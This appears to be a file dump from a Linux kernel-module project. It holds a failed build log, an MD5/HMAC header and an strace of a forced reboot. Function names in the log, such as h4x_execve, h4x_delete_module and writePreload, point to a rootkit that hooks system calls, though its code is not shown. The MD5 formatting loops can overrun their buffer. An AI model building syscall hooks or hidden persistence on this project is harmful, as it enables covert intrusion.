/mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:702: warning: ignoring return value of ‘copy_to_user’, declared with attribute warn_unused_result 11 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_unlink’: 12 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:715: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 13 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_rmdir’: 14 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:730: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 15 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_unlinkat’: 16 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:744: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 17 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_rename’: 18 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:759: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 19 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:760: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 20 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘writeInit’: 21 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:807: warning: ISO C90 forbids mixed declarations and code 22 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:836: warning: ISO C90 forbids mixed declarations and code 23 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘delInit’: 24 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:916: warning: ISO C90 forbids mixed declarations and code 25 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:919: warning: ISO C90 forbids mixed declarations and code 26 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_delete_module’: 27 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:966: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 28 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘my_reboot’: 29 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:979: warning: no return statement in function returning non-void 30 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘my_signal’: 31 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:984: warning: no return statement in function returning non-void 32 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘writePreload’: 33 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1029: warning: ISO C90 forbids mixed declarations and code 34 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘delPreload’: 35 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1127: warning: ISO C90 forbids mixed declarations and code 36 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1136: warning: ISO C90 forbids mixed declarations and code 37 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_open’: 38 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1184: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 39 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_execve’: 40 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1236: warning: ISO C90 forbids mixed declarations and code 41 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1245: error: expected expression before ‘)’ token 42 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘init’: 43 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1297: warning: ISO C90 forbids mixed declarations and code 44 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1304: warning: assignment makes integer from pointer without a cast 45 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1308: warning: assignment makes integer from pointer without a cast 46 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1313: warning: assignment makes pointer from integer without a cast 47 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1314: warning: assignment makes integer from pointer without a cast 48 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1318: warning: assignment makes pointer from integer without a cast 49 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1319: warning: assignment makes integer from pointer without a cast 50 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1320: warning: assignment makes pointer from integer without a cast 51 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1321: warning: assignment makes integer from pointer without a cast 52 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1322: warning: assignment makes pointer from integer without a cast 53 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1323: warning: assignment makes integer from pointer without a cast 54 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1324: warning: assignment makes pointer from integer without a cast 55 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1325: warning: assignment makes integer from pointer without a cast 56 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1326: warning: assignment makes pointer from integer without a cast 57 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1327: warning: assignment makes integer from pointer without a cast 58 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1328: warning: assignment makes pointer from integer without a cast 59 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1329: warning: assignment makes integer from pointer without a cast 60 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1330: warning: assignment makes pointer from integer without a cast 61 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1331: warning: assignment makes integer from pointer without a cast 62 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1333: warning: assignment makes pointer from integer without a cast 63 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1334: warning: assignment makes integer from pointer without a cast 64 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1336: warning: assignment makes pointer from integer without a cast 65 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1350: warning: assignment makes pointer from integer without a cast 66 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1351: warning: assignment makes integer from pointer without a cast 67 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1352: warning: assignment makes pointer from integer without a cast 68 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1353: warning: assignment makes integer from pointer without a cast 69 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘exit’: 70 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1378: warning: assignment makes integer from pointer without a cast 71 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1381: warning: assignment makes integer from pointer without a cast 72 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1385: warning: assignment makes integer from pointer without a cast 73 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1389: warning: assignment makes integer from pointer without a cast 74 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1390: warning: assignment makes integer from pointer without a cast 75 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1391: warning: assignment makes integer from pointer without a cast 76 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1392: warning: assignment makes integer from pointer without a cast 77 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1393: warning: assignment makes integer from pointer without a cast 78 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1394: warning: assignment makes integer from pointer without a cast 79 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1395: warning: assignment makes integer from pointer without a cast 80 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1396: warning: assignment makes integer from pointer without a cast 81 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1401: warning: assignment makes integer from pointer without a cast 82 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1402: warning: assignment makes integer from pointer without a cast 83 | make[2]: *** [/mnt/hgfs/work_virtual/JynKbeast/dnsmodule.o] Error 1 84 | make[1]: *** [_module_/mnt/hgfs/work_virtual/JynKbeast] Error 2 85 | make: *** [all] Error 2 86 | -------------------------------------------------------------------------------- /md5.h: -------------------------------------------------------------------------------- 1 | /* MD5lib.h - md5 library 2 | */ 3 | 4 | /* Copyright (C) 1990-2, RSA Data Security, Inc. Created 1990. All 5 | rights reserved. 6 | 7 | RSA Data Security, Inc. makes no representations concerning either 8 | the merchantability of this software or the suitability of this 9 | software for any particular purpose. It is provided "as is" 10 | without express or implied warranty of any kind. 11 | 12 | These notices must be retained in any copies of any part of this 13 | documentation and/or software. 14 | */ 15 | 16 | /* The following makes MD default to MD5 if it has not already been 17 | defined with C compiler flags. 18 | */ 19 | 20 | 21 | #include 22 | #include 23 | #include 24 | 25 | #define MD 5 26 | 27 | /* GLOBAL.H - RSAREF types and constants 28 | */ 29 | 30 | /* PROTOTYPES should be set to one if and only if the compiler supports 31 | function argument prototyping. 32 | The following makes PROTOTYPES default to 0 if it has not already 33 | been defined with C compiler flags. 34 | */ 35 | #ifndef PROTOTYPES 36 | #define PROTOTYPES 0 37 | #endif 38 | 39 | /* POINTER defines a generic pointer type */ 40 | typedef unsigned char *POINTER; 41 | 42 | /* UINT2 defines a two byte word */ 43 | typedef unsigned short int UINT2; 44 | 45 | /* UINT4 defines a four byte word */ 46 | typedef unsigned long int UINT4; 47 | 48 | /* PROTO_LIST is defined depending on how PROTOTYPES is defined above. 49 | If using PROTOTYPES, then PROTO_LIST returns the list, otherwise it 50 | returns an empty list. 51 | */ 52 | #if PROTOTYPES 53 | #define PROTO_LIST(list) list 54 | #else 55 | #define PROTO_LIST(list) () 56 | #endif 57 | 58 | 59 | /* Length of test block, number of test blocks. 60 | */ 61 | #define TEST_BLOCK_LEN 1000 62 | #define TEST_BLOCK_COUNT 1000 63 | 64 | 65 | 66 | /* Constants for MD5Transform routine. 67 | */ 68 | #define S11 7 69 | #define S12 12 70 | #define S13 17 71 | #define S14 22 72 | #define S21 5 73 | #define S22 9 74 | #define S23 14 75 | #define S24 20 76 | #define S31 4 77 | #define S32 11 78 | #define S33 16 79 | #define S34 23 80 | #define S41 6 81 | #define S42 10 82 | #define S43 15 83 | #define S44 21 84 | 85 | //char* MDString PROTO_LIST ((char *)); void MDString (const char *string,char *result); 86 | char* MDFile PROTO_LIST ((char *)); 87 | char* hmac_md5(char* text, char* key); 88 | 89 | typedef struct { 90 | UINT4 state[4]; /* state (ABCD) */ 91 | UINT4 count[2]; /* number of bits, modulo 2^64 (lsb first) */ 92 | unsigned char buffer[64]; /* input buffer */ 93 | } MD5_CTX; 94 | 95 | /*void MD5Init PROTO_LIST ((MD5_CTX *)); 96 | void MD5Update PROTO_LIST 97 | ((MD5_CTX *, unsigned char *, unsigned int)); 98 | void MD5Final PROTO_LIST ((unsigned char [16], MD5_CT X *)); 99 | 100 | static void MD5Transform PROTO_LIST ((UINT4 [4], unsigned char [64])); 101 | static void Encode PROTO_LIST 102 | ((unsigned char *, UINT4 *, unsigned int)); 103 | static void Decode PROTO_LIST 104 | ((UINT4 *, unsigned char *, unsigned int)); 105 | static void MD5_memcpy PROTO_LIST ((POINTER, POINTER, unsigned int)); 106 | static void MD5_memset PROTO_LIST ((POINTER, int, unsigned int)); 107 | */ 108 | static unsigned char PADDING[64] = { 109 | 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 110 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 111 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 112 | }; 113 | 114 | /* F, G, H and I are basic MD5 functions. 115 | */ 116 | #define F(x, y, z) (((x) & (y)) | ((~x) & (z))) 117 | #define G(x, y, z) (((x) & (z)) | ((y) & (~z))) 118 | #define H(x, y, z) ((x) ^ (y) ^ (z)) 119 | #define I(x, y, z) ((y) ^ ((x) | (~z))) 120 | 121 | /* ROTATE_LEFT rotates x left n bits. 122 | */ 123 | #define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n)))) 124 | 125 | /* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4. 126 | Rotation is separate from addition to prevent recomputation. 127 | */ 128 | #define FF(a, b, c, d, x, s, ac) {(a)+=F((b), (c), (d)) + (x) + (UINT4)(ac);(a)= ROTATE_LEFT((a),(s)); (a)+=(b);} 129 | #define GG(a, b, c, d, x, s, ac) {(a) += G ((b), (c), (d)) + (x) + (UINT4)(ac);(a) = ROTATE_LEFT ((a), (s)); (a) += (b);} 130 | #define HH(a, b, c, d, x, s, ac) {(a) += H ((b), (c), (d)) + (x) + (UINT4)(ac);(a) = ROTATE_LEFT ((a), (s)); (a) += (b);} 131 | #define II(a, b, c, d, x, s, ac) {(a) += I ((b), (c), (d)) + (x) + (UINT4)(ac);(a) = ROTATE_LEFT ((a), (s)); (a) += (b);} 132 | void MD5Init (MD5_CTX *context); 133 | void MD5Update(MD5_CTX *context, unsigned char *input,unsigned int inputLen); 134 | 135 | void MD5Final (unsigned char digest[16], MD5_CTX *context); 136 | static void MD5Transform (UINT4 [4], unsigned char [64]) ; 137 | static void Encode(unsigned char *, UINT4 *, unsigned int); 138 | static void Decode (UINT4 *, unsigned char *, unsigned int); 139 | static void MD5_memcpy(POINTER, POINTER, unsigned int); 140 | static void MD5_memset(POINTER, int, unsigned int); 141 | 142 | /* MD5 initialization. Begins an MD5 operation, writing a new context. 143 | */ 144 | void MD5Init (MD5_CTX *context) 145 | /* context */ 146 | { 147 | context->count[0] = context->count[1] = 0; 148 | /* Load magic initialization constants. 149 | */ 150 | context->state[0] = 0x67452301; 151 | context->state[1] = 0xefcdab89; 152 | context->state[2] = 0x98badcfe; 153 | context->state[3] = 0x10325476; 154 | } 155 | 156 | /* MD5 block update operation. Continues an MD5 message-digest 157 | operation, processing another message block, and updating the 158 | context. 159 | */ 160 | void MD5Update (MD5_CTX *context, unsigned char *input,unsigned int inputLen ) 161 | /* context */ 162 | /* input block */ 163 | /* length of input block */ 164 | { 165 | unsigned int i, index, partLen; 166 | 167 | /* Compute number of bytes mod 64 */ 168 | index = (unsigned int)((context->count[0] >> 3) & 0x3F); 169 | 170 | /* Update number of bits */ 171 | if ((context->count[0] += ((UINT4)inputLen << 3)) 172 | < ((UINT4)inputLen << 3)) 173 | context->count[1]++; 174 | context->count[1] += ((UINT4)inputLen >> 29); 175 | 176 | partLen = 64 - index; 177 | 178 | /* Transform as many times as possible. 179 | */ 180 | if (inputLen >= partLen) { 181 | MD5_memcpy 182 | ((POINTER)&context->buffer[index], (POINTER)input, partLen); 183 | MD5Transform (context->state, context->buffer); 184 | 185 | for (i = partLen; i + 63 < inputLen; i += 64) 186 | MD5Transform (context->state, &input[i]); 187 | 188 | index = 0; 189 | } 190 | else 191 | i = 0; 192 | 193 | /* Buffer remaining input */ 194 | MD5_memcpy 195 | ((POINTER)&context->buffer[index], (POINTER)&input[i], 196 | inputLen-i); 197 | } 198 | 199 | /* MD5 finalization. Ends an MD5 message-digest operation, writing the 200 | the message digest and zeroizing the context. 201 | */ 202 | void MD5Final (unsigned char digest[16], MD5_CTX *context) 203 | /* message digest */ 204 | /* context */ 205 | { 206 | unsigned char bits[8]; 207 | unsigned int index, padLen; 208 | 209 | /* Save number of bits */ 210 | Encode (bits, context->count, 8); 211 | 212 | /* Pad out to 56 mod 64. 213 | */ 214 | index = (unsigned int)((context->count[0] >> 3) & 0x3f); 215 | padLen = (index < 56) ? (56 - index) : (120 - index); 216 | MD5Update (context,(unsigned char*) PADDING, padLen); 217 | 218 | /* Append length (before padding) */ 219 | MD5Update (context, bits, 8); 220 | /* Store state in digest */ 221 | Encode (digest, context->state, 16); 222 | 223 | /* Zeroize sensitive information. 224 | */ 225 | MD5_memset ((POINTER)context, 0, sizeof (*context)); 226 | } 227 | 228 | /* MD5 basic transformation. Transforms state based on block. 229 | */ 230 | static void MD5Transform (UINT4 state[4], 231 | unsigned char block[64]) 232 | 233 | { 234 | int i=0; 235 | 236 | UINT4 a = state[0], b = state[1], c = state[2], d = state[3], x[16]; 237 | 238 | Decode (x, block, 64); 239 | 240 | /* Round 1 */ 241 | FF (a, b, c, d, x[ 0], S11, 0xd76aa478); /* 1 */ 242 | FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 */ 243 | FF (c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */ 244 | FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); /* 4 */ 245 | FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); /* 5 */ 246 | FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */ 247 | FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */ 248 | FF (b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 */ 249 | FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */ 250 | FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); /* 10 */ 251 | FF (c, d, a, b, x[10], S13, 0xffff5bb1); /* 11 */ 252 | FF (b, c, d, a, x[11], S14, 0x895cd7be); /* 12 */ 253 | FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */ 254 | FF (d, a, b, c, x[13], S12, 0xfd987193); /* 14 */ 255 | FF (c, d, a, b, x[14], S13, 0xa679438e); /* 15 */ 256 | FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */ 257 | 258 | /* Round 2 */ 259 | GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */ 260 | GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */ 261 | GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */ 262 | GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */ 263 | GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 21 */ 264 | GG (d, a, b, c, x[10], S22, 0x2441453); /* 22 */ 265 | GG (c, d, a, b, x[15], S23, 0xd8a1e681); /* 23 */ 266 | GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); /* 24 */ 267 | GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); /* 25 */ 268 | GG (d, a, b, c, x[14], S22, 0xc33707d6); /* 26 */ 269 | GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); /* 27 */ 270 | GG (b, c, d, a, x[ 8], S24, 0x455a14ed); /* 28 */ 271 | GG (a, b, c, d, x[13], S21, 0xa9e3e905); /* 29 */ 272 | GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); /* 30 */ 273 | GG (c, d, a, b, x[ 7], S23, 0x676f02d9); /* 31 */ 274 | GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); /* 32 */ 275 | 276 | /* Round 3 */ 277 | HH (a, b, c, d, x[ 5], S31, 0xfffa3942); /* 33 */ 278 | HH (d, a, b, c, x[ 8], S32, 0x8771f681); /* 34 */ 279 | HH (c, d, a, b, x[11], S33, 0x6d9d6122); /* 35 */ 280 | HH (b, c, d, a, x[14], S34, 0xfde5380c); /* 36 */ 281 | HH (a, b, c, d, x[ 1], S31, 0xa4beea44); /* 37 */ 282 | HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); /* 38 */ 283 | HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); /* 39 */ 284 | HH (b, c, d, a, x[10], S34, 0xbebfbc70); /* 40 */ 285 | HH (a, b, c, d, x[13], S31, 0x289b7ec6); /* 41 */ 286 | HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); /* 42 */ 287 | HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); /* 43 */ 288 | HH (b, c, d, a, x[ 6], S34, 0x4881d05); /* 44 */ 289 | HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); /* 45 */ 290 | HH (d, a, b, c, x[12], S32, 0xe6db99e5); /* 46 */ 291 | HH (c, d, a, b, x[15], S33, 0x1fa27cf8); /* 47 */ 292 | HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); /* 48 */ 293 | 294 | /* Round 4 */ 295 | II (a, b, c, d, x[ 0], S41, 0xf4292244); /* 49 */ 296 | II (d, a, b, c, x[ 7], S42, 0x432aff97); /* 50 */ 297 | II (c, d, a, b, x[14], S43, 0xab9423a7); /* 51 */ 298 | II (b, c, d, a, x[ 5], S44, 0xfc93a039); /* 52 */ 299 | II (a, b, c, d, x[12], S41, 0x655b59c3); /* 53 */ 300 | II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); /* 54 */ 301 | II (c, d, a, b, x[10], S43, 0xffeff47d); /* 55 */ 302 | II (b, c, d, a, x[ 1], S44, 0x85845dd1); /* 56 */ 303 | II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); /* 57 */ 304 | II (d, a, b, c, x[15], S42, 0xfe2ce6e0); /* 58 */ 305 | II (c, d, a, b, x[ 6], S43, 0xa3014314); /* 59 */ 306 | II (b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */ 307 | II (a, b, c, d, x[ 4], S41, 0xf7537e82); /* 61 */ 308 | II (d, a, b, c, x[11], S42, 0xbd3af235); /* 62 */ 309 | II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); /* 63 */ 310 | II (b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */ 311 | 312 | state[0] += a; 313 | state[1] += b; 314 | state[2] += c; 315 | state[3] += d; 316 | 317 | /* Zeroize sensitive information. 318 | */ 319 | MD5_memset ((POINTER)x, 0, sizeof (x)); 320 | } 321 | 322 | /* Encodes input (UINT4) into output (unsigned char). Assumes len is 323 | a multiple of 4. 324 | */ 325 | static void Encode (unsigned char *output, 326 | UINT4 *input, 327 | unsigned int len) 328 | 329 | { 330 | unsigned int i, j; 331 | 332 | for (i = 0, j = 0; j < len; i++, j += 4) { 333 | output[j] = (unsigned char)(input[i] & 0xff); 334 | output[j+1] = (unsigned char)((input[i] >> 8) & 0xff); 335 | output[j+2] = (unsigned char)((input[i] >> 16) & 0xff); 336 | output[j+3] = (unsigned char)((input[i] >> 24) & 0xff); 337 | } 338 | } 339 | 340 | /* Decodes input (unsigned char) into output (UINT4). Assumes len is 341 | a multiple of 4. 342 | */ 343 | static void Decode (UINT4 *output, 344 | unsigned char *input, 345 | unsigned int len) 346 | 347 | { 348 | unsigned int i, j; 349 | 350 | for (i = 0, j = 0; j < len; i++, j += 4) 351 | output[i] = ((UINT4)input[j]) | (((UINT4)input[j+1]) << 8) | 352 | (((UINT4)input[j+2]) << 16) | (((UINT4)input[j+3]) << 24); 353 | } 354 | 355 | /* Note: Replace "for loop" with standard memcpy if possible. 356 | */ 357 | 358 | static void MD5_memcpy (POINTER output, 359 | POINTER input, 360 | unsigned int len) 361 | 362 | { 363 | unsigned int i; 364 | 365 | for (i = 0; i < len; i++) 366 | output[i] = input[i]; 367 | } 368 | 369 | /* Note: Replace "for loop" with standard memset if possible. 370 | */ 371 | static void MD5_memset (POINTER output, 372 | int value, 373 | unsigned int len) 374 | 375 | { 376 | unsigned int i; 377 | 378 | for (i = 0; i < len; i++) 379 | ((char *)output)[i] = (char)value; 380 | } 381 | 382 | /* Digests a string and prints the result. 383 | */ 384 | void MDString (const char *string,char *result) 385 | 386 | { 387 | MD5_CTX context; 388 | unsigned char digest[16]; 389 | char output1[32]; 390 | static char output[33]={""}; 391 | unsigned int len = strlen (string); 392 | int i; 393 | MD5Init (&context); 394 | MD5Update (&context, (unsigned char*)string, len); 395 | MD5Final (digest, &context); 396 | 397 | for (i = 0; i < 16; i++) 398 | {sprintf(&(output1[2*i]),"%02x",(unsigned char)digest[i]); 399 | sprintf(&(output1[2*i+1]),"%02x",(unsigned char)(digest[i]<<4)); 400 | } 401 | for(i=0;i<32;i++) 402 | result[i]=output1[i]; 403 | //return output; 404 | } 405 | 406 | 407 | /* Digests a file and prints the result. 408 | */ 409 | char* MDFile (char *filename) 410 | 411 | { static char output[33]={""}; 412 | FILE *file; 413 | MD5_CTX context; 414 | int len; 415 | unsigned char buffer[1024], digest[16]; 416 | int i; 417 | char output1[32]; 418 | if ((file = fopen (filename, "rb")) == NULL) 419 | { printf ("%s can't be openedn", filename); 420 | return 0; 421 | } 422 | else { 423 | MD5Init (&context); 424 | while (len = fread (buffer, 1, 1024, file)) 425 | MD5Update (&context, buffer, len); 426 | MD5Final (digest, &context); 427 | fclose (file); 428 | for (i = 0; i < 16; i++) 429 | {sprintf(&(output1[2*i]),"%02x",(unsigned char)digest[i]); 430 | sprintf(&(output1[2*i+1]),"%02x",(unsigned char)(digest[i]<<4)); 431 | } 432 | for(i=0;i<32;i++) 433 | output[i]=output1[i]; 434 | return output; 435 | } 436 | } 437 | 438 | char* hmac_md5(char* text,char* key) 439 | { 440 | char digest[16]; 441 | char output1[32]; 442 | static char output[33]={""}; 443 | MD5_CTX context; 444 | unsigned char k_ipad[65]; /* inner padding - 445 | * key XORd with ipad 446 | */ 447 | unsigned char k_opad[65]; /* outer padding - 448 | * key XORd with opad 449 | */ 450 | unsigned char tk[16]; 451 | int i; 452 | int text_len = strlen (text); 453 | int key_len=strlen(key); 454 | /* if key is longer than 64 bytes reset it to key=MD5(key) */ 455 | if (key_len > 64) { 456 | 457 | MD5_CTX tctx; 458 | 459 | MD5Init(&tctx); 460 | MD5Update(&tctx,(unsigned char*) key, key_len); 461 | MD5Final(tk, &tctx); 462 | 463 | key = (char*)tk; 464 | key_len = 16; 465 | } 466 | 467 | /* 468 | * the HMAC_MD5 transform looks like: 469 | * 470 | * MD5(K XOR opad, MD5(K XOR ipad, text)) 471 | * 472 | * where K is an n byte key 473 | * ipad is the byte 0x36 repeated 64 times 474 | * opad is the byte 0x5c repeated 64 times 475 | * and text is the data being protected 476 | */ 477 | 478 | /* start out by storing key in pads */ 479 | 480 | /*bzero( k_ipad, sizeof k_ipad); 481 | bzero( k_opad, sizeof k_opad); 482 | */ 483 | 484 | for(i=0;i<65;i++) 485 | k_ipad[i]=(unsigned char)0; 486 | for(i=0;i<65;i++) 487 | k_opad[i]=(unsigned char)0; 488 | 489 | /*bcopy( key, k_ipad, key_len); 490 | bcopy( key, k_opad, key_len); 491 | */ 492 | for(i=0;i 6, base_addr:0xb7f6b6c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 18 | mprotect(0x8df000, 8192, PROT_READ) = 0 19 | mprotect(0x797000, 4096, PROT_READ) = 0 20 | munmap(0xb7f6d000, 38920) = 0 21 | geteuid32() = 0 22 | chdir("/") = 0 23 | access("/var/run/utmpx", F_OK) = -1 ENOENT (No such file or directory) 24 | open("/var/run/utmp", O_RDONLY|O_LARGEFILE) = 3 25 | fcntl64(3, F_GETFD) = 0 26 | fcntl64(3, F_SETFD, FD_CLOEXEC) = 0 27 | _llseek(3, 0, [0], SEEK_SET) = 0 28 | brk(0) = 0x8ef1000 29 | brk(0x8f12000) = 0x8f12000 30 | alarm(0) = 0 31 | rt_sigaction(SIGALRM, {0x8a58a0, [], 0}, {SIG_DFL, [], 0}, 8) = 0 32 | alarm(1) = 0 33 | fcntl64(3, F_SETLKW, {type=F_RDLCK, whence=SEEK_SET, start=0, len=0}) = 0 34 | read(3, "\10\0\0\0\f\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 384) = 384 35 | fcntl64(3, F_SETLKW, {type=F_UNLCK, whence=SEEK_SET, start=0, len=0}) = 0 36 | alarm(0) = 1 37 | rt_sigaction(SIGALRM, {SIG_DFL, [], 0}, NULL, 8) = 0 38 | alarm(0) = 0 39 | rt_sigaction(SIGALRM, {0x8a58a0, [], 0}, {SIG_DFL, [], 0}, 8) = 0 40 | alarm(1) = 0 41 | fcntl64(3, F_SETLKW, {type=F_RDLCK, whence=SEEK_SET, start=0, len=0}) = 0 42 | read(3, "\2\0\0\0\0\0\0\0~\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 384) = 384 43 | fcntl64(3, F_SETLKW, {type=F_UNLCK, whence=SEEK_SET, start=0, len=0}) = 0 44 | alarm(0) = 1 45 | rt_sigaction(SIGALRM, {SIG_DFL, [], 0}, NULL, 8) = 0 46 | alarm(0) = 0 47 | rt_sigaction(SIGALRM, {0x8a58a0, [], 0}, {SIG_DFL, [], 0}, 8) = 0 48 | alarm(1) = 0 49 | fcntl64(3, F_SETLKW, {type=F_RDLCK, whence=SEEK_SET, start=0, len=0}) = 0 50 | read(3, "\1\0\0\0003N\0\0~\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 384) = 384 51 | fcntl64(3, F_SETLKW, {type=F_UNLCK, whence=SEEK_SET, start=0, len=0}) = 0 52 | alarm(0) = 1 53 | rt_sigaction(SIGALRM, {SIG_DFL, [], 0}, NULL, 8) = 0 54 | open("/halt", O_RDWR|O_CREAT, 0644) = 4 55 | close(4) = 0 56 | execve("/sbin/shutdown", ["shutdown", "-r", "now"], [/* 23 vars */]) = 0 57 | brk(0) = 0x8e9f000 58 | access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) 59 | open("/etc/ld.so.cache", O_RDONLY) = 3 60 | fstat64(3, {st_mode=S_IFREG|0644, st_size=38920, ...}) = 0 61 | mmap2(NULL, 38920, 